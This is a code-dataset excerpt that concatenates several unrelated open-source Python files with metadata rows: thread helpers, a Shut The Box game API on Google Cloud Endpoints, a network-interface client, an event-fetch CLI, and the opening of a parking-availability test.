# logging.debug("Acquired lock: %s @ %s, caller: %s, args: %s %s",
# lock, lockaddr, func.__name__, args, kwargs)
return func(*args, **kwargs)
return protected
return lock_decorator
def start_new_thread(target, args=None, daemon=False):
"""Start a new thread"""
new_thread = None
if args:
new_thread = threading.Thread(target=target, args=args)
else:
new_thread = threading.Thread(target=target)
if daemon:
new_thread.daemon = True
new_thread.start()
logging.info("Started new thread : %s with target %s and args %s",
new_thread.ident, target, args)
logging.debug("Currently active threads: %s",
get_active_threads())
def get_active_threads():
"""Return the list of active thread objects"""
return threading.enumerate()
def get_local_storage():
"""Return a thread local storage object"""
return threading.local()
def set_thread_name(name):
"""Set the current thread name"""
threading.current_thread().name = name
def get_thread_name():
"""Get the current thread name"""
return threading.current_thread().name
def get_lock(reentrant=False):
"""Return a unmanaged thread Lock or Rlock"""
if reentrant:
return threading.RLock()
else:
return threading.Lock()
| apache-2.0 | -7,395,830,211,116,294,000 | 29.19084 | 87 | 0.591909 | false | 4.145702 | false | false | false |
snackattas/ShutTheBox | pkg/main.py | 1 | 38891 | """main.py - This file creates and configures the Google Cloud Endpoints
for the ShutTheBox game, and contains part of the game logic and statistical
methods."""
import endpoints
from protorpc import remote, messages, message_types
from google.appengine.ext import ndb
from google.appengine.api import memcache
import logging
from models import User, Game, Turn
# Forms for doing the CRUD on the database
from models import CreateUserRequestForm, CreateUserResultForm
from models import EmailNotificationRequestForm, EmailNotificationResulForm
from models import NewGameRequestForm, NewGameResultForm
from models import TurnRequestForm, TurnResultForm
from models import CancelResultForm
# These next forms just read data
from models import FindGamesRequestForm, TotalFindGamesResultForm
from models import UserStatsRequestForm, UserStatsResultForm
from models import HighScoresRequestForm, TotalHighScoresResultForm
from models import LeaderboardRequestForm, UserLeaderboardResultForm, \
TotalLeaderboardResultForm
from models import AllTurnsReportResultForm
from utils import get_by_urlsafe
from collections import namedtuple
from operator import attrgetter
import pickle
# # ONLY UNCOMMENT/IMPORT THE MODULES BELOW IF USING THE test_method
# from models import InsertOrDeleteDataRequestForm, InsertOrDeleteDataResultForm
# INSERT_OR_DELETE_REQUEST = endpoints.ResourceContainer(
# InsertOrDeleteDataRequestForm)
# import json
# import requests as outside_requests
# import random
CREATE_USER_REQUEST = endpoints.ResourceContainer(CreateUserRequestForm)
EMAIL_NOTIFICATION_REQUEST = endpoints.ResourceContainer(
EmailNotificationRequestForm)
NEW_GAME_REQUEST = endpoints.ResourceContainer(NewGameRequestForm)
# Adding urlsafe_key like this makes it a required parameter and passes it as
# a path parameter in the URL
TURN_REQUEST = endpoints.ResourceContainer(TurnRequestForm,
urlsafe_key=messages.StringField(1))
URLSAFE_KEY_REQUEST = endpoints.ResourceContainer(
urlsafe_key=messages.StringField(1))
FIND_GAMES_REQUEST = endpoints.ResourceContainer(FindGamesRequestForm)
USER_STATS_REQUEST = endpoints.ResourceContainer(UserStatsRequestForm)
HIGH_SCORES_REQUEST = endpoints.ResourceContainer(HighScoresRequestForm)
LEADERBOARD_REQUEST = endpoints.ResourceContainer(LeaderboardRequestForm)
@endpoints.api(name='shut_the_box', version='v1')
class ShutTheBoxApi(remote.Service):
"""A set of methods implementing the gameplay of the classic British pub
game Shut The Box. The entire game is implemented on the server-side
through Google's Cloud Endpoints. The state of a game is remembered by
passing an individual game's entity key to the client, serving as a state
token."""
# First 4 APIs are functional and actually do things
@endpoints.method(request_message=CREATE_USER_REQUEST,
response_message=CreateUserResultForm,
path='create_user',
name='create_user',
http_method='POST')
def create_user(self, request):
"""Creates a User.
:param username (req): A unique username without leading spaces.
:type username: string
:param email (opt): A unique and valid email. Email is validated using
MAILGUN email validation API.
:type email: string
:param email_notification (opt): True by default. If True, user will
receive email notifications of outstanding active games.
:type email_notification: boolean
:returns message: A message confirming user was created, or an error
message.
:rtype message: string
:raises: ConflictException"""
# Some format checking
if not request.username:
raise endpoints.ConflictException(
'User name cannot be null')
if len(request.username) != len(request.username.lstrip(' ')):
raise endpoints.ConflictException(
'User name can not have leading spaces')
if request.username.isspace():
raise endpoints.ConflictException(
'User name cannot be null')
# Checking for duplicate entries
if User.query(User.username == request.username).get():
raise endpoints.ConflictException(
'A user with the name {} already exists!'.
format(request.username))
# Only check if email is valid if there is an email to check
if request.email:
if User.query(User.email == request.email).get():
raise endpoints.ConflictException(
'A user with the email {} already exists!'.
format(request.email))
# Checking if the email is valid via MAILGUN APIs
if not User.is_email_valid(request.email):
return CreateUserResultForm(
message="Email address invalid! User is not created.")
# All is good, saving User object
user = User(
username=request.username,
email=request.email,
email_notification=request.email_notification)
user.put()
else:
user = User(username=request.username)
user.put()
return CreateUserResultForm(message='User {} created!'.
format(request.username))
@endpoints.method(request_message=EMAIL_NOTIFICATION_REQUEST,
response_message=EmailNotificationResulForm,
path='email_notification',
name='email_notification',
http_method='POST')
def set_email_notification_preference(self, request):
"""Allows a user to change their email notification preference.
:param username (req): A unique username without leading spaces.
:type username: string
:param email_notification (req): If True, user will receive email
notifications of outstanding active games that haven't been played in
the last 12 hours. If False, users will stop receiving these
notifications.
:type email_notifications: boolean
:returns message: A message confirming email notification preference,
or an error.
:rtype message: string"""
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
user.email_notification = request.email_notification
user.put()
return EmailNotificationResulForm(message="Email notification"\
"preferences set to {}".format(request.email_notification))
@endpoints.method(request_message=NEW_GAME_REQUEST,
response_message=NewGameResultForm,
path='new_game',
name='new_game',
http_method='POST')
def new_game(self, request):
"""Creates a new game and returns the game's urlsafe key.
:param username (req): A unique username.
:type username: string
:param number_of_tiles (req): Number of tiles to play Shut The Box with.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (req): When two dice are rolled in a turn,
this determines if the number to aim for with the flipped tiles is the
sum of the dice roll or the product.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns username: User's username.
:rtype username: string
:returns number_of_tiles: Number of tiles to play Shut The Box with.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: When two dice are rolled in a turn,
this determines if the number to aim for with the flipped tiles is the
sum of the dice roll or the product.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns urlsafe_key: This serves as the state token for a game of Shut
The Box.
:rtype urlsafe-key: string
:returns message: A helpful message or an error message.
:rtype message: string
:raises: NotFoundException, ConflictException"""
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
if not request.number_of_tiles or not request.dice_operation:
raise endpoints.ConflictException(
'User must specify the number of tiles and the dice operation')
game = Game.new_game(user.key, request.number_of_tiles.number,
request.dice_operation.name)
return game.to_new_game_result_form("Good luck playing Shut The"\
"Box,{}!".format(user.username))
@endpoints.method(request_message=TURN_REQUEST,
response_message=TurnResultForm,
path='game/{urlsafe_key}',
name='turn',
http_method='PUT')
def turn(self, request):
"""Plays one turn of Shut The Box.
To play Shut The Box, first call turn() with only a urlsafe_key and flip
tiles null. It returns a roll and a full set of tiles.
Each subsequent call of turn() must include both a urlsafe_key and
flip_tiles, and turn() will determine the validity of flip_tiles and
compute the next roll. The goal is to flip all the tiles and get the
lowest score possible.
:param urlsafe_key (req): The state token for a game of Shut The Box.
:type urlsafe_key: string
:param flip_tiles (opt): Leave this parameter null for the first call of
turn(). On subsequent calls, flip_tiles are the integers to be
flipped in response to the roll.
:type flip_tiles: list of non-negative integers
:returns urlsafe_key: The same urlsafe_key passed in.
:rtype urlsafe_key: string
:returns roll: A list of two integers, each between 1-6, if there are
active tiles above 7 in play. If all tiles above 7 are inactive only
one integer is returned.
:rtype roll: list of non-negative integers
:returns active_tiles: The newly computed active_tiles left after the
roll has been played.
:rtype active_tiles: A list of non-negative integers
:returns valid_move: True if flip_tiles played are valid, False if they
are not valid.
:rtype valid_move: boolean
:returns score: A running score of the active_tiles in play.
:rtype score: non-negative integer
:returns game_over: If True, game is over.
:rtype game_over: boolean
:returns message: A helpful message or an error message.
:rtype message: string
:raises: BadRequestException, ValueError"""
# First make sure the game's key is real/not game over status
game = get_by_urlsafe(request.urlsafe_key, Game)
if game.game_over:
form = TurnResultForm()
form.urlsafe_key = request.urlsafe_key
form.valid_move = False
form.game_over = True
form.message = "This game is already over. Play again by calling "\
"new_game()!"
return form
# If it's a real game, get the most recent turn
MEMCACHE_KEY = game.key.urlsafe()
recent_turn = game.most_recent_turn()
if not recent_turn:
# If recent_turn is null, this is the first roll!
turn = Turn.first_turn(game)
if not memcache.add(key=MEMCACHE_KEY, value=pickle.dumps(turn),
time=360):
logging.warning("Memcache addition failed!")
return turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Call turn() again to play your roll")
# If it's not a user's first turn, user must pass in flip_tiles
if not request.flip_tiles:
return recent_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=False,
message="User must pass in values to flip_tiles!")
# Check if it's a valid flip
error = recent_turn.invalid_flip(request.flip_tiles,
game.dice_operation)
if error:
return recent_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=False,
message=error)
# Since it's a valid flip, end the last turn
recent_turn.end_turn()
# Create a new turn
new_turn = recent_turn.new_turn(game, request.flip_tiles)
# If the new turn does not have any active tiles, it's a perfect score
# and the game's over
if not new_turn.active_tiles:
new_turn.end_game(game)
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Game over! Perfect score! Call new_game() to play again!")
# Check if the roll from the new turn ends the game
game_over = new_turn.is_game_over(game)
if game_over:
new_turn.end_game(game)
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Game over! Call new_game() to play again!")
# If the code's fallen through to here, the roll is valid. Add newest turn to memcache
if not memcache.replace(key=MEMCACHE_KEY, value=pickle.dumps(new_turn),
time=360):
logging.warning("Memcache logging failed!")
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Call turn() again to play your roll")
@endpoints.method(request_message=URLSAFE_KEY_REQUEST,
response_message=CancelResultForm,
path='cancel_game/{urlsafe_key}',
name='cancel_game',
http_method='DELETE')
def cancel_game(self, request):
"""Cancels a Game entity and its children Turn entities. User can
only cancel games in progress. This API operates under the assumpion
that it's better to just cancel games outright instead of somehow
marking them as deleted in the database.
:param urlsafe_key (req): The state token for a game of Shut The Box.
:type urlsafe_key: string
:returns cancelled: True if the game entity and Turn entities are
deleted from the datastore; False if the game entity in question is
completed.
:rtype cancelled: boolean
:returns error: Helpful error message.
:rtype error: string
:raises: BadRequestException, ValueError"""
game = get_by_urlsafe(request.urlsafe_key, Game)
if game.game_over:
return CancelResultForm(
cancelled=False,
error="Can't cancel games that are already completed.")
# This deletes both the parent game and the children turns
ndb.delete_multi(ndb.Query(ancestor=game.key).iter(keys_only=True))
return CancelResultForm(cancelled=True)
# The next APIs are statistics, game state information, and leaderboards
# They don't create, update, or delete the database, they just read from
# it
# The rubric calls for a method get_user_games, but I expanded this API to
# have that functionality and more
@endpoints.method(request_message=FIND_GAMES_REQUEST,
response_message=TotalFindGamesResultForm,
path='find_games',
name='find_games',
http_method='POST')
def find_games(self, request):
"""Searches for games matching the passed in search criteria and
returns basic information about them.
Will return an error if both games_in_progress and finished_games are
True.
:param games_in_progress (opt): False by default. If True, filters by
games in progress.
:type games_in_progress: boolean
:param finished_games (opt): False by default. If True, filters by
finished games.
:type finished_games: boolean
:param number_of_tiles (opt): Filters games by number of tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): Filters games by dice operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param username (opt): Filters by username.
:type username: string
:returns games: A list of games. Each game is made up of the parameters
below.
:rtype games: list
:returns urlsafe_key: The state token for this game of Shut The Box.
:rtype urlsafe_key: string
:returns number_of_tiles: Number of tiles for this game.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: Dice operation for this game.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns game_over: If True, this game is over.
:rtype game_over: boolean
:returns turns_played: Number of turns played for this game.
:rtype turns_played: integer
:raises: NotFoundException, BadRequestException"""
# if username is passed in, look for only their games
if request.username:
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
games_query = Game.query(ancestor=user.key)
else:
games_query = Game.query()
if request.games_in_progress == True \
and request.finished_games == True:
raise endpoints.BadRequestException("games_report can't be called "
"with both parameters games_in_progress and finished_games "
"True")
if request.games_in_progress:
games_query = games_query.filter(Game.game_over == False)
if request.finished_games:
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
# Return the most recent games first
games_query = games_query.order(-Game.timestamp)
games = games_query.fetch()
return TotalFindGamesResultForm(
games=[game.to_find_games_result_form() for game in games])
@endpoints.method(request_message=USER_STATS_REQUEST,
response_message=UserStatsResultForm,
path='user_stats',
name='user_stats',
http_method='POST')
def get_user_stats(self, request):
"""Returns user statistics for a particular user.
The statistics are completed games, total score, total turns, average
score, and average turns. Able to filter by dice operation and number
of dice.
:param username (req): A unique username.
:type username: string
:param number_of_tiles (opt): If specified, filters to return games
with the specified number_of_tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): If specified, filters to return games
with the specified dice_operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns games_completed: Number of games completed.
:rtype games_completed: integer
:returns total_score: Total score of completed games.
:rtype total_score: integer
:returns total_turns: Total number of turns for completed games.
:returns average_score: Average score from completed games, rounded
to 3 decimal places.
:rtype average_score: float
:returns average_turns: Average turns fromcompleted games, rounded
to 3 decimal places.
:rtype average_turns: float
:returns message: Helpful error message.
:rtype message: string
:raises: NotFoundException"""
# TODO: For the life of me, I could not figure out how to make this
# method into a GET request with multiple query parameters (username,
# number_of_dice, dice_operation). I was able to figure out how to
# do it with one parameter, but not multiple. And the google
# tutorial only features GETs with 1 parameter.
# https://github.com/GoogleCloudPlatform/python-docs-samples/blob
# /master/appengine/standard/endpoints/backend/main.py
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
games_query = Game.query(ancestor=user.key)
# Only return games that have a status of game_over
games_query = games_query.filter(Game.game_over == True)
# Optional filters
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games = games_query.fetch()
if not games:
return UserStatsResultForm(message="No games found!")
(games_completed, total_score, total_turns,
average_score, average_turns) = Game.games_stats(games)
form = UserStatsResultForm(
games_completed=games_completed,
total_score=total_score,
total_turns=total_turns,
average_score=average_score,
average_turns=average_turns)
return form
@endpoints.method(request_message=HIGH_SCORES_REQUEST,
response_message=TotalHighScoresResultForm,
path='high_scores',
name='high_scores',
http_method='POST')
def get_high_scores(self, request):
"""Returns a list of high scores. In Shut The Box, lower scores are
better, so a list of high scores is a list of the scores from lowest to
highest. In the case of a tie, order is determined by which game
finished first.
The high scores are able to be filtered by dice_operation or
number_of_tiles.
:param number_of_tiles (opt): If specified, filters to
return games with the specified number_of_tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): If specified, filters to
return games with the specified dice_operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param number_of_results (opt): Number of high scores to return
:type number_of_results: integer. DEFAULT=20
:returns high_scores: List of games ordered by high scores. Each game
contains the parameters below.
:rtype high_score: list
:returns score: The final score.
:rtype score: integer
:returns username: The user who played this game.
:rtype username: string
:returns number_of_tiles: Number of tiles for this game.
Shut The Box with.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: Dice operation for this game.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns timestamp: The date and time when the game was completed.
:rtype timestamp:
:returns message: Helpful error message
:rtype message: string
:raises: BadArgumentError"""
if request.number_of_results < 0:
return TotalHighScoresResultForm(message="number_of_results must "\
"not be below 0!")
# Order by the most recent lowest score
games_query = Game.query()
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games_query = games_query.order(Game.final_score, -Game.timestamp)
games = games_query.fetch(limit=request.number_of_results)
if not games:
return TotalHighScoresResultForm(message="No games match criteria!")
return TotalHighScoresResultForm(
high_scores=[game.to_high_scores_result_form() for game in games])
@endpoints.method(request_message=LEADERBOARD_REQUEST,
response_message=TotalLeaderboardResultForm,
path='leaderboard',
name='leaderboard',
http_method='POST')
def get_leaderboard(self, request):
"""List of ranked users. Users are ranked by average_score from low
to high, and in the case of a tie in average score, the rank is
determined by lowest average_turns.
Users are only able to be ranked if they have completed 5 or more
games. The leaderboard is able to be filtered by dice operation and/or
number of tiles.
:param number_of_tiles (opt): Filters leaderboard by number of tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): Filters leaderboard by dice operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param username (opt): If specified returns rank of only that user.
:type username: string
:returns ranked_users: List of users ordered by rank. Each user is
made up of the parameters below.
:rtype ranked_users: list
:returns username: A unique username.
:rtype username: string
:returns total_score: Total score of completed games.
:rtype total_score: integer
:returns total_turns: Total number of turns for completed games.
:rtype total_turns: integer
:returns average_score: Average score from completed games.
:rtype average_score: float
:returns average_turns: Average turns from completed games.
:rtype average_turns: float
:returns games_completed: Number of games completed.
:rtype games_completed: integer
:returns rank: Rank of the user.
:rtype rank: integer
:returns message: Helpful error message.
:rtype message: string
:raises: NotFoundException"""
if request.username:
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
users = User.query().fetch()
if not users:
return TotalLeaderboardResultForm(message="No users created yet!")
# Create an empty leaderboard list. It will be filled with instances
# of the UserStats named tuple
leaderboard = []
UserStats = namedtuple('UserStats',
['total_score', 'average_score', 'average_turns',
'games_completed', 'username'])
for user in users:
games_query = Game.query(ancestor=user.key)
# Only use games that are over
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games = games_query.fetch()
# If this user has played less than 5 games, don't rank them. Must
# complete 5 or more games to become ranked, due to the nature of
# ranking in Shut The Box. It would be too easy for one user to
# play one game, get a perfect score, and then suddenly overtake
# the leaderboard
if len(games) < 5:
continue
(games_completed, total_score, total_turns, average_score,
average_turns) = Game.games_stats(games)
user_stats = UserStats(total_score, average_score,
average_turns, games_completed, user.username)
leaderboard.append(user_stats)
# if no users have completed games quit early
if not leaderboard:
return TotalLeaderboardResultForm(message="No rankable users"\
"yet!")
# Now to sort the results in this specific way
leaderboard.sort(key=attrgetter('average_score', 'average_turns',
'username'))
# Now to assign rank on the already sorted leaderboard list. It's not
# as simple as just using enumerate because of possible ties
rank = 0
last_average_score = -1
last_average_turns = -1
for n, user in enumerate(leaderboard):
rank += 1
# Take into account the tie scenario
if user.average_score == last_average_score and \
user.average_turns == last_average_turns:
rank -= 1
# Need to put the UserStats object in a list so append will work
leaderboard[n] = [leaderboard[n]]
leaderboard[n].append(rank)
# Save off the last ranked user's statistics
last_average_score = user.average_score
last_average_turns = user.average_turns
# If username is specified, make that the only result in the leaderboard
if request.username:
for ranked_user in leaderboard:
if ranked_user[0].username == request.username:
leaderboard = [ranked_user]
if leaderboard[0][0].username is not request.username:
return TotalLeaderboardResultForm(
message="{} is not ranked yet!".format(request.username))
# Now loop through the leaderboard one last time and put the content
# into a form
forms = []
for ranked_user in leaderboard:
user_stats = ranked_user[0]
rank = ranked_user[1]
leaderboard_form = UserLeaderboardResultForm(
username=user_stats.username,
average_score=user_stats.average_score,
average_turns=user_stats.average_turns,
total_score=user_stats.total_score,
games_completed=user_stats.games_completed,
rank=rank)
forms.append(leaderboard_form)
return TotalLeaderboardResultForm(ranked_users=forms)
@endpoints.method(request_message=URLSAFE_KEY_REQUEST,
response_message=AllTurnsReportResultForm,
path='game_history',
name='game_history',
http_method='POST')
def get_game_history(self, request):
"""Returns the history of moves for the game passed in, allowing game
progression to be viewed move by move.
:param urlsafe_key (req): This is the urlsafe_key returned
from calling new_game(). It serves as the state token for a single
game of Shut The Box.
:type urlsafe_key: string
:returns turns: A list of turns for a specific game. Each turn contains
the parameters below.
:rtype turns: list
:returns turn: The turn number.
:rtype turn: integer
:returns roll: The dice roll for that turn.
:rtype roll: list of non-negative integers
:returns tiles_played: The tiles flipped that turn.
:rtype tiles_played: a list of non-negative integers.
:returns score: A running total of the active tiles in play.
:rtype score: non-negative integer
:returns game_over: If True, game is over. If False,
more turns can be played.
:rtype game_over: boolean
:raises: BadRequestException, ValueError"""
game = get_by_urlsafe(request.urlsafe_key, Game)
turns = Turn.query(ancestor=game.key).order(Turn.timestamp).fetch()
# Not all the information is present in the turns object for the game
# history report. We need to manipulate the active tiles so that it
# stores the tiles played, not the tiles on the board. To do that
# we loop through the turns and calculate the difference between the
# active tiles present in the last turn vs the active tiles in the
# current turn. We use python sets and set.difference to repurpose
# active_tiles. We also score the score of each turn in this new
# active_tiles because you wouldn't be able to calculate it anymore
# with active_tiles being repurposed.
# Ex:
# Before:
# Loop 1: active_tiles: [1,2,3,4,5,6,7,8,9]
# Loop 2: active_tiles: [1,2,3,4,5,6,7,8]
# Loop 3: active_tiles: [1,2,3,6,7,8]
#
# After:
# Loop 1: active_tiles: [45, []]
# Loop 2: active_tiles: [36, [9]]
# Loop 3: active_tiles: [27, [4,5]]
for turn in turns:
# set last_turn explicitly in the first loop
if turn.turn == 0:
last_turn = set(turn.active_tiles)
current_turn = set(turn.active_tiles)
tiles_played = list(last_turn.difference(current_turn))
# Set last_turn now for the next loop
last_turn = set(turn.active_tiles)
# Now we are going to repurpose turn.active_tiles to store the
# score and the tiles played
score = sum(turn.active_tiles)
turn.active_tiles = []
turn.active_tiles.append(score)
turn.active_tiles.append(tiles_played)
return AllTurnsReportResultForm(
turns=[turn.to_turn_report_result_form() for turn in turns])
# # ONLY UNCOMMENT/IMPORT THE MODULES BELOW IF USING THE test_method
# @endpoints.method(request_message=INSERT_OR_DELETE_REQUEST,
# response_message=InsertOrDeleteDataResultForm,
# path='test_method',
# name='test_method',
# http_method='POST')
# def test_method(self, request):
# if request.delete_everything:
# users = User.query().iter(keys_only=True)
# ndb.delete_multi(users)
# games = Game.query().iter(keys_only=True)
# ndb.delete_multi(games)
# turns = Turn.query().iter(keys_only=True)
# ndb.delete_multi(turns)
# return InsertOrDeleteDataResultForm(message="All Users, Games, "\
# "Turns deleted!")
# # some setup for creating request for new games
# version = "v1"
# port = 8080
# base_url = "http://localhost:{}/_ah/api/shut_the_box/{}/".\
# format(port, version)
# new_game_url = base_url + "new_game"
# # some setup for creating the games
# DICE_OPERATION = ["ADDITION", "MULTIPLICATION"]
# NUMBER_OF_TILES = ["NINE", "TWELVE"]
#
# with open("pkg/test_data.JSON") as data_file:
# json_data = json.load(data_file)
# users = json_data["users"]
# turns = json_data["turns"]
# for user in users:
# new_user = User(
# username=user["username"],
# email=user["email"])
# new_user.put()
# # Now to create the games
# for user in users:
# for n in range(20): # create 10 games per user
# dice_operation = random.choice(DICE_OPERATION)
# number_of_tiles = random.choice(NUMBER_OF_TILES)
# create_json = [{
# "dice_operation": dice_operation,
# "number_of_tiles": number_of_tiles,
# "username": user["username"]}]
# outside_request = outside_requests.post(
# url=new_game_url, params=create_json[0])
# raw_urlsafe_key = outside_request.json()["urlsafe_key"]
# game_entity = get_by_urlsafe(raw_urlsafe_key, Game)
# turn_list = random.choice(turns.get(
# dice_operation + number_of_tiles))
# for turn in turn_list.get("turn_list"):
# new_turn = Turn(
# key=Turn.create_turn_key(game_entity.key),
# active_tiles=turn.get("active_tiles"),
# roll=turn.get("roll"),
# turn=turn.get("turn"))
# if turn.get("turn_over"):
# new_turn.turn_over = turn.get("turn_over")
# if turn.get("game_over"):
# new_turn.game_over = turn.get("game_over")
# new_turn.put()
# final_score = turn_list.get("final_score")
# if final_score is not None:
# game_entity.final_score = final_score
# game_entity.game_over = True
# game_entity.put()
# return InsertOrDeleteDataResultForm(message="Data added "\
# "successfully!")
| mit | 5,379,919,921,991,045,000 | 44.5932 | 95 | 0.60847 | false | 4.287872 | false | false | false |
netrack/python-netrackclient | netrackclient/netrack/v1/network.py | 1 | 2752 | from netrackclient import errors
from netrackclient.netrack.v1 import constants
import collections
import ipaddress
_Network = collections.namedtuple("Network", [
"encapsulation",
"address",
"interface",
"interface_name",
])
class Network(_Network):
def __new__(cls, **kwargs):
kwargs = dict((k, kwargs.get(k)) for k in _Network._fields)
return super(Network, cls).__new__(cls, **kwargs)
class NetworkManager(object):
def __init__(self, client):
super(NetworkManager, self).__init__()
self.client = client
def _url(self, datapath, interface):
url = "{url_prefix}/datapaths/{datapath}/network/interfaces/{interface}"
return url.format(url_prefix=constants.URL_PREFIX,
datapath=datapath,
interface=interface)
def _encapsulation(self, address):
#TODO: add support of other protocols
network = ipaddress.ip_interface(address)
return "ipv{0}".format(network.version)
def update(self, datapath, interface, network):
url = self._url(datapath, interface)
# parse address to configure encapsulation
encapsulation = self._encapsulation(network.address)
try:
self.client.put(url, body=dict(
encapsulation=encapsulation,
address=network.address,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
def get(self, datapath, interface):
try:
response = self.client.get(self._url(
datapath=datapath,
interface=interface,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
return Network(**response.body())
def list(self, datapath):
url = "{url_prefix}/datapaths/{datapath}/network/interfaces"
url = url.format(url_prefix=constants.URL_PREFIX,
datapath=datapath)
try:
response = self.client.get(url)
except errors.BaseErorr as e:
raise errors.NetworkError(*e.args)
interfaces = []
for interface in response.body():
interfaces.append(Network(**interface))
return interfaces
def delete(self, datapath, interface, network):
url = self._url(datapath, interface)
# parse address to configure encapsulation
encapsulation = self._encapsulation(network.address)
try:
self.client.delete(url, body=dict(
encapsulation=encapsulation,
address=network.address,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
| lgpl-3.0 | -8,860,857,873,628,524,000 | 28.591398 | 80 | 0.597747 | false | 4.467532 | false | false | false |
boundary/pulse-api-cli | boundary/event_get.py | 4 | 1613 | #
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import ApiCli
import requests
import json
class EventGet(ApiCli):
def __init__(self):
ApiCli.__init__(self)
self.event_id = None
def add_arguments(self):
ApiCli.add_arguments(self)
self.parser.add_argument('-i', '--event-id', dest='event_id', action='store', required=True,
metavar='event_id', help='Event id of the event to fetch')
def get_arguments(self):
if self.args.event_id is not None:
self.event_id = self.args.event_id
self.path = "v1/events/{0}".format(self.event_id)
def get_description(self):
return "Gets a single event by id from a {0} account".format(self.product_name)
def _handle_results(self):
# Only process if we get HTTP result of 200
if self._api_result.status_code == requests.codes.ok:
out = json.dumps(json.loads(self._api_result.text), sort_keys=True, indent=4, separators=(',', ': '))
print(self.colorize_json(out))
| apache-2.0 | -2,112,440,596,593,151,700 | 34.065217 | 113 | 0.66088 | false | 3.786385 | false | false | false |
Tisseo/navitia | source/jormungandr/jormungandr/parking_space_availability/car/tests/star_test.py | 2 | 4311 | # encoding: utf-8
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
import pytest
from mock import MagicMock
from jormungandr.parking_space_availability.car.star import StarProvider
from jormungandr.parking_space_availability.car.parking_places import ParkingPlaces
poi = {
'properties': {
'operator': 'Keolis Rennes',
'ref': '42'
},
'poi_type': {
'name': 'parking relais',
'id': 'poi_type:amenity:parking'
}
}
def car_park_space_availability_start_support_poi_test():
"""
STAR car provider support
"""
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
assert provider.support_poi(poi)
def car_park_space_get_information_test():
parking_places = ParkingPlaces(available=4,
occupied=3,
available_PRM=2,
occupied_PRM=0)
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
star_response = """
{
"records":[
{
"fields": {
"nombreplacesdisponibles": 4,
"nombreplacesoccupees": 3,
"nombreplacesdisponiblespmr": 2,
